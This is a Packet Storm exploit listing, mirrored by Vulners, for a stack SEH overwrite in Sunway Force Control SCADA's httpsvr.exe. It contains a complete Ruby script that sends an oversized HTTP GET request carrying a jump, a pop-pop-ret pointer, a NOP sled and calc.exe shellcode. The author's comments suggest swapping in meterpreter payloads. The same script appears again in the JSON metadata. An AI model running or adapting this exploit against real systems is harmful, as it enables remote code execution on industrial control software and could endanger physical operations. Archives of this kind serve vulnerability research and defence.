Search...

Sunway Force Control SCADA 6.1 SP3 SEH Overwrite

2011-08-26T00:00:00

ID PACKETSTORM:104500
Type packetstorm
Reporter Canberk BOLAT
Modified 2011-08-26T00:00:00

Description

                                        
                                            `# Sunway Force Control SCADA httpsvr.exe Exploit  
# Exploitable with simple SEH Overwrite technique  
# Tested on XP SP0 English  
# Probably will work on XP SP3 if you find none-safeseh dll for p/p/r pointer  
# Canberk BOLAT | @cnbrkbolat  
# cbolat.blogspot.com  
# for fun ;)  
#  
# notez: other payloads not working stable because of memory region's status.  
# i tested meterpreter/bind_tcp and others some of them not work because of  
# trying to write to unwritable memory regions.  
# if you write some asm for changing access protection of memory region  
# it can be work. try it, do it!  
#  
# Vendor: http://www.sunwayland.com.cn/  
  
def send(packet)  
begin  
sock = TCPSocket.new(@ip, @port)  
sock.write(packet)  
rescue Exception =&gt; e  
return false  
else  
resp = sock.recv(1024)  
sock.close  
  
return true  
end  
end  
  
@ip = ARGV[0]  
@port = 80  
  
# windows/exec CMD=calc.exe  
shellcode = "\xb8\xd5\x45\x06\xc4\xda\xde\xd9\x74\x24\xf4\x5b\x33\xc9" +  
"\xb1\x33\x31\x43\x12\x03\x43\x12\x83\x3e\xb9\xe4\x31\x3c" +  
"\xaa\x60\xb9\xbc\x2b\x13\x33\x59\x1a\x01\x27\x2a\x0f\x95" +  
"\x23\x7e\xbc\x5e\x61\x6a\x37\x12\xae\x9d\xf0\x99\x88\x90" +  
"\x01\x2c\x15\x7e\xc1\x2e\xe9\x7c\x16\x91\xd0\x4f\x6b\xd0" +  
"\x15\xad\x84\x80\xce\xba\x37\x35\x7a\xfe\x8b\x34\xac\x75" +  
"\xb3\x4e\xc9\x49\x40\xe5\xd0\x99\xf9\x72\x9a\x01\x71\xdc" +  
"\x3b\x30\x56\x3e\x07\x7b\xd3\xf5\xf3\x7a\x35\xc4\xfc\x4d" +  
"\x79\x8b\xc2\x62\x74\xd5\x03\x44\x67\xa0\x7f\xb7\x1a\xb3" +  
"\xbb\xca\xc0\x36\x5e\x6c\x82\xe1\xba\x8d\x47\x77\x48\x81" +  
"\x2c\xf3\x16\x85\xb3\xd0\x2c\xb1\x38\xd7\xe2\x30\x7a\xfc" +  
"\x26\x19\xd8\x9d\x7f\xc7\x8f\xa2\x60\xaf\x70\x07\xea\x5d" +  
"\x64\x31\xb1\x0b\x7b\xb3\xcf\x72\x7b\xcb\xcf\xd4\x14\xfa" +  
"\x44\xbb\x63\x03\x8f\xf8\x9c\x49\x92\xa8\x34\x14\x46\xe9" +  
"\x58\xa7\xbc\x2d\x65\x24\x35\xcd\x92\x34\x3c\xc8\xdf\xf2" +  
"\xac\xa0\x70\x97\xd2\x17\x70\xb2\xb0\xf6\xe2\x5e\x19\x9d" +  
"\x82\xc5\x65"  
  
payload = "H" * 1599  
payload &lt;&lt; "\xeb\x06\x90\x90" # Pointer to Next SE Handler  
payload &lt;&lt; [0x719737FA].pack("V*") # SEH Handler - p/p/r  
payload &lt;&lt; "\x90" * 40  
payload &lt;&lt; shellcode  
payload &lt;&lt; "\x90" * (4058 - shellcode.length)  
  
pack = "GET /#{payload} HTTP/1.1\r\n"  
pack &lt;&lt; "Host: http://#{@ip}:#{@port}\r\n\r\n"  
  
puts "packet sended." if send(pack)  
  
`

JSON Vulners Source

Initial Source

{"edition": 1, "title": "Sunway Force Control SCADA 6.1 SP3 SEH Overwrite", "bulletinFamily": "exploit", "published": "2011-08-26T00:00:00", "lastseen": "2016-11-03T10:28:37", "history": [], "modified": "2011-08-26T00:00:00", "reporter": "Canberk BOLAT", "hash": "1cecdcea81da0ea655e57890bfb39176c2d97769a257dfc9b0d3681a9c1251ad", "sourceHref": "https://packetstormsecurity.com/files/download/104500/sunway-overwrite.txt", "viewCount": 0, "href": "https://packetstormsecurity.com/files/104500/Sunway-Force-Control-SCADA-6.1-SP3-SEH-Overwrite.html", "description": "", "type": "packetstorm", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "7c33874d4fb5142262808ce362dbffad"}, {"key": "modified", "hash": "76bd11f263fa3a5672168342040bb329"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "76bd11f263fa3a5672168342040bb329"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "f248dbe1d5e06a132752819b1559efca"}, {"key": "sourceData", "hash": "2cdff93183418f320e5eb96118bc92ca"}, {"key": "sourceHref", "hash": "397b0dae3176673351f54e98de9b113e"}, {"key": "title", "hash": "2327f4bb772ff37d70688b0fb95867d9"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "references": [], "objectVersion": "1.2", "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2016-11-03T10:28:37"}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:37"}, "vulnersScore": 0.6}, "sourceData": "`# Sunway Force Control SCADA httpsvr.exe Exploit \n# Exploitable with simple SEH Overwrite technique \n# Tested on XP SP0 English \n# Probably will work on XP SP3 if you find none-safeseh dll for p/p/r pointer \n# Canberk BOLAT | @cnbrkbolat \n# cbolat.blogspot.com \n# for fun ;) \n# \n# notez: other payloads not working stable because of memory region's status. \n# i tested meterpreter/bind_tcp and others some of them not work because of \n# trying to write to unwritable memory regions. \n# if you write some asm for changing access protection of memory region \n# it can be work. try it, do it! \n# \n# Vendor: http://www.sunwayland.com.cn/ \n \ndef send(packet) \nbegin \nsock = TCPSocket.new(@ip, @port) \nsock.write(packet) \nrescue Exception => e \nreturn false \nelse \nresp = sock.recv(1024) \nsock.close \n \nreturn true \nend \nend \n \n@ip = ARGV[0] \n@port = 80 \n \n# windows/exec CMD=calc.exe \nshellcode = \"\\xb8\\xd5\\x45\\x06\\xc4\\xda\\xde\\xd9\\x74\\x24\\xf4\\x5b\\x33\\xc9\" + \n\"\\xb1\\x33\\x31\\x43\\x12\\x03\\x43\\x12\\x83\\x3e\\xb9\\xe4\\x31\\x3c\" + \n\"\\xaa\\x60\\xb9\\xbc\\x2b\\x13\\x33\\x59\\x1a\\x01\\x27\\x2a\\x0f\\x95\" + \n\"\\x23\\x7e\\xbc\\x5e\\x61\\x6a\\x37\\x12\\xae\\x9d\\xf0\\x99\\x88\\x90\" + \n\"\\x01\\x2c\\x15\\x7e\\xc1\\x2e\\xe9\\x7c\\x16\\x91\\xd0\\x4f\\x6b\\xd0\" + \n\"\\x15\\xad\\x84\\x80\\xce\\xba\\x37\\x35\\x7a\\xfe\\x8b\\x34\\xac\\x75\" + \n\"\\xb3\\x4e\\xc9\\x49\\x40\\xe5\\xd0\\x99\\xf9\\x72\\x9a\\x01\\x71\\xdc\" + \n\"\\x3b\\x30\\x56\\x3e\\x07\\x7b\\xd3\\xf5\\xf3\\x7a\\x35\\xc4\\xfc\\x4d\" + \n\"\\x79\\x8b\\xc2\\x62\\x74\\xd5\\x03\\x44\\x67\\xa0\\x7f\\xb7\\x1a\\xb3\" + \n\"\\xbb\\xca\\xc0\\x36\\x5e\\x6c\\x82\\xe1\\xba\\x8d\\x47\\x77\\x48\\x81\" + \n\"\\x2c\\xf3\\x16\\x85\\xb3\\xd0\\x2c\\xb1\\x38\\xd7\\xe2\\x30\\x7a\\xfc\" + \n\"\\x26\\x19\\xd8\\x9d\\x7f\\xc7\\x8f\\xa2\\x60\\xaf\\x70\\x07\\xea\\x5d\" + \n\"\\x64\\x31\\xb1\\x0b\\x7b\\xb3\\xcf\\x72\\x7b\\xcb\\xcf\\xd4\\x14\\xfa\" + \n\"\\x44\\xbb\\x63\\x03\\x8f\\xf8\\x9c\\x49\\x92\\xa8\\x34\\x14\\x46\\xe9\" + \n\"\\x58\\xa7\\xbc\\x2d\\x65\\x24\\x35\\xcd\\x92\\x34\\x3c\\xc8\\xdf\\xf2\" + \n\"\\xac\\xa0\\x70\\x97\\xd2\\x17\\x70\\xb2\\xb0\\xf6\\xe2\\x5e\\x19\\x9d\" + \n\"\\x82\\xc5\\x65\" \n \npayload = \"H\" * 1599 \npayload << \"\\xeb\\x06\\x90\\x90\" # Pointer to Next SE Handler \npayload << [0x719737FA].pack(\"V*\") # SEH Handler - p/p/r \npayload << \"\\x90\" * 40 \npayload << shellcode \npayload << \"\\x90\" * (4058 - shellcode.length) \n \npack = \"GET /#{payload} HTTP/1.1\\r\\n\" \npack << \"Host: http://#{@ip}:#{@port}\\r\\n\\r\\n\" \n \nputs \"packet sended.\" if send(pack) \n \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "cvelist": [], "id": "PACKETSTORM:104500"}